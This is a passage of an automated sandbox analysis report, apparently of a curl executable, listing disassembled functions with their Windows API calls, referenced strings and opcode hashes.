                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProcgetsockoptsetsockopt
                                        • String ID: @
                                        • API String ID: 1224256098-2726393805
                                        • Opcode ID: 6870bde0bdfdd52fc5d677c4bc94c68cb9e39a0b15eaa4dbad549a21ce671c3f
                                        • Instruction ID: 55d3a78e4985b36f9f08cb3a81993685d88e62680395440a3da8612d599fa56c
                                        • Opcode Fuzzy Hash: 6870bde0bdfdd52fc5d677c4bc94c68cb9e39a0b15eaa4dbad549a21ce671c3f
                                        • Instruction Fuzzy Hash: A70144B1A00745BAE760DF54DC89FAE77ADEB04709F104076E601E6281D7B49A858660
                                        APIs
                                        • gethostname.WS2_32(?,00000401), ref: 000F7300
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000F7316
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ___from_strstr_to_strchrgethostname
                                        • String ID: localhost
                                        • API String ID: 2455561156-2663516195
                                        • Opcode ID: b780a494c1211c398a47246e396ffcb7a463c0217139a4cafcfeef3e498280b7
                                        • Instruction ID: 4b3f7419e109ff5f2c86c1a92a9e7986263f3ed04058ba4ca5ced87dd0995e59
                                        • Opcode Fuzzy Hash: b780a494c1211c398a47246e396ffcb7a463c0217139a4cafcfeef3e498280b7
                                        • Instruction Fuzzy Hash: 2B0168B0A04308AEDB54D7749C40AEAB7A9DF08300F4000FCD785AB182DE70AE86D765
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C6CE3
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 000C6CF8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _strdupfree
                                        • String ID: ;auto
                                        • API String ID: 1865132094-1462600812
                                        • Opcode ID: e7670fc8fecc05df119900c582d2071f4047fc2bae83fcbad4ca645322e8d346
                                        • Instruction ID: df459db511e725121ab54fbdd1206483f6c25e67e534d748bf6f36eff8bf6e81
                                        • Opcode Fuzzy Hash: e7670fc8fecc05df119900c582d2071f4047fc2bae83fcbad4ca645322e8d346
                                        • Instruction Fuzzy Hash: 5801A13410C7819FC3A68B348890BAF7FD16F5A314F184D6DE4D687281DB329485C716
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C7782
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C779E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _strdupfree
                                        • String ID: a
                                        • API String ID: 1865132094-3904355907
                                        • Opcode ID: 8c12b6aaebbbbcb11196e6fc974ba1f797203df951acd60aa318c24e7bd03528
                                        • Instruction ID: 63c6063102af636959463539b56e07a95f710ad3fcae5bee86e5bb0599ccf699
                                        • Opcode Fuzzy Hash: 8c12b6aaebbbbcb11196e6fc974ba1f797203df951acd60aa318c24e7bd03528
                                        • Instruction Fuzzy Hash: 8A014B7850C7C19FD7A2CB348444BAFBBD56F9A314F1C8E0CE4E997240DB3198468B56
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C75FB
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00004000), ref: 000C7617
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _strdupfree
                                        • String ID: SRP
                                        • API String ID: 1865132094-1918707673
                                        • Opcode ID: 7d613522cb52758c85a3357366d111ba7766be448361c737c821dfabc3d935a8
                                        • Instruction ID: ab6aa19be411b100cc35d6b8102ae28d55023a5f453ced62a7cf19ba4336fef3
                                        • Opcode Fuzzy Hash: 7d613522cb52758c85a3357366d111ba7766be448361c737c821dfabc3d935a8
                                        • Instruction Fuzzy Hash: 22F09031708700CFD768DF75A401FAFB3E5AB84701F10892EE54EDB280EB3098418BA0
                                        APIs
                                        • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(curl: ,?,?,000C878D,?,%s,00000000), ref: 000C916A
                                        Strings
                                        • curl: try 'curl --help' for more information, xrefs: 000C9188
                                        • curl: , xrefs: 000C9165
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: fputs
                                        • String ID: curl: $curl: try 'curl --help' for more information
                                        • API String ID: 1795875747-4128371185
                                        • Opcode ID: 559f8fb3588a38386713f3dcf7700b46456d7c8e5f393f1af1b266184d3ccbd6
                                        • Instruction ID: d9894ba63fe20e60d90b2bc80dc7aa6793508699c12b3752674ca35991e2498d
                                        • Opcode Fuzzy Hash: 559f8fb3588a38386713f3dcf7700b46456d7c8e5f393f1af1b266184d3ccbd6
                                        • Instruction Fuzzy Hash: 7AE04F3501470CFFDF095F80EC06AE937A9EB90354F10C015FD28062A1EB72A9A0CB55
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E7312
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E73DB
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E73EF
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E7451
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 265fdb66a4dfa364c8f370556ffc825444d499eaf9dd7798f4891e47780512ae
                                        • Instruction ID: 823fff53026d28384953b89bc5570a9959240a23ac986c774cf1ba944368f022
                                        • Opcode Fuzzy Hash: 265fdb66a4dfa364c8f370556ffc825444d499eaf9dd7798f4891e47780512ae
                                        • Instruction Fuzzy Hash: 4A615C71A04246DFCF54CF65D884AADBBF1FF48310F248169E819A7391D770AE41DB91
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010F91E
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010F94E
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010F99B
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010F9AB
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: malloc
                                        • String ID:
                                        • API String ID: 2803490479-0
                                        • Opcode ID: 939f95a46a64c479b0fec68d36830ec5f142c537a9e3e3684611924cef624d60
                                        • Instruction ID: 0e128589e2fe51b0e9447f745367dfee2caa7fba06620f46da9dbc30339300f6
                                        • Opcode Fuzzy Hash: 939f95a46a64c479b0fec68d36830ec5f142c537a9e3e3684611924cef624d60
                                        • Instruction Fuzzy Hash: 7C416B31A04519EFCF089F68E88599CBFB5FF48350B1480AAE859DB751DBB0AD90CF91
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000F711C), ref: 001101E4
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000F711C), ref: 00110212
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000F711C), ref: 00110233
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0011024A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 82b65339022b5a5fdc1df6f5b7c64cd4cd79bac06d34959d38d3cf3ae8a1b3f6
                                        • Instruction ID: 3fd2830805a866ecad1962cb271a83818710035a9f17dac4a3c56931c4b588cc
                                        • Opcode Fuzzy Hash: 82b65339022b5a5fdc1df6f5b7c64cd4cd79bac06d34959d38d3cf3ae8a1b3f6
                                        • Instruction Fuzzy Hash: 10219A76A00926EFCB095F14ED58058BBB2FF48361750803FE50593A60CB74ACA1CF86
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E1DBD,?,?,?,000C8B8E), ref: 000E151F
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000C8B8E), ref: 000E1549
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1577
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E15A5
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 9de9838478d67407c7e3680fb199cb6d84f83b8a36658c8c4cdbb74ce154dc20
                                        • Instruction ID: 16884f00ce90c8dded70694de09b8377709639c128e40f9cb289cebe19675b47
                                        • Opcode Fuzzy Hash: 9de9838478d67407c7e3680fb199cb6d84f83b8a36658c8c4cdbb74ce154dc20
                                        • Instruction Fuzzy Hash: 1B210532B00918EFDB098B24EC887D8FBA2FF85321F004166D44557291CB743E55CBA2
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E9633,00000000), ref: 0010A4FB
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E9633,00000000), ref: 0010A52C
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E9633,00000000), ref: 0010A54E
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010A565
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 154027d6482a4292b0d41440fddcdc9e8d44824ec2b9ad04b7decbcd741d21ca
                                        • Instruction ID: b28d97e4c26a7f04fc037d4bfbae3169acc3c7a90c2a5f5cb012687bf93d0830
                                        • Opcode Fuzzy Hash: 154027d6482a4292b0d41440fddcdc9e8d44824ec2b9ad04b7decbcd741d21ca
                                        • Instruction Fuzzy Hash: 6F112776A00926EFC7089F65ED84458FBB2FF48361310C13FE81993A20CB74A861CF81
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,?,?,000C9BB3,?,?,00000000), ref: 000CFEE1
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,?,?,000C9BB3,?,?,00000000), ref: 000CFEF9
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,000C9BB3,?,?,00000000), ref: 000CFF16
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000CFF24
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: a60becd6b66a70800ef98478f4137b4ceec44bb9c112809395f730f23562d0b5
                                        • Instruction ID: 7d7a34119d4e86ad0cb4933364cfe18744cbbfb682f7645b42195b4c15e4107c
                                        • Opcode Fuzzy Hash: a60becd6b66a70800ef98478f4137b4ceec44bb9c112809395f730f23562d0b5
                                        • Instruction Fuzzy Hash: 19119A32505213DFC7648FA4D888FAEBBE6FF41315F21413DE812A7611CBB1A981CB95
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FA0A9
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FA0CB
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FA0E8
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FA100
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 97343b7d66e229719a47a5c9b2d0d5a62058fc6e339f68e30372a426631c3071
                                        • Instruction ID: 5caeeb433c98dfae48ef1e84bba3f5f837b5f50f848fc8714aa392e2383cd39f
                                        • Opcode Fuzzy Hash: 97343b7d66e229719a47a5c9b2d0d5a62058fc6e339f68e30372a426631c3071
                                        • Instruction Fuzzy Hash: C1116536614A16EFD7148F15E8487A9B7B5FF44329F10802AE44183A61CB78BCA5CFD5
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,000E1857), ref: 000F5C78
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F5CAD
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F5CC4
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F5CDB
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: c3d452304ffa975dda2c81f57e6894ecdf28607b680c0cacc8781c2fb2b1ff70
                                        • Instruction ID: 05c49cc424cde4eec5321fa5efabec7c4c225790ddb648bae6b4438612ca275d
                                        • Opcode Fuzzy Hash: c3d452304ffa975dda2c81f57e6894ecdf28607b680c0cacc8781c2fb2b1ff70
                                        • Instruction Fuzzy Hash: C901B376A0492AEFCB085F55ED44458FBB2FB88361310C13BE51593A60CB7468A18FD5
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010C7B9
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010C7D6
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010C7EF
                                          • Part of subcall function 0010C6E0: CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000040,00000000,74F80130,?,0010C800,00000000), ref: 0010C6F4
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010C816
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: freemalloc$AcquireContextCrypt
                                        • String ID:
                                        • API String ID: 669775102-0
                                        • Opcode ID: a14fbaaa2718d72c47a65db8c17c4ec1c5d54fcf03c356d9a77a2f4b418039dd
                                        • Instruction ID: 0cb52ea97b53928f975746ac637371e093829812348d0f14ada803b4c1cd82e7
                                        • Opcode Fuzzy Hash: a14fbaaa2718d72c47a65db8c17c4ec1c5d54fcf03c356d9a77a2f4b418039dd
                                        • Instruction Fuzzy Hash: 3E01AD36714427DBCB185B24FC0451A3BA6EBC47A1B21C03BE885D36E0DFA05C428FE5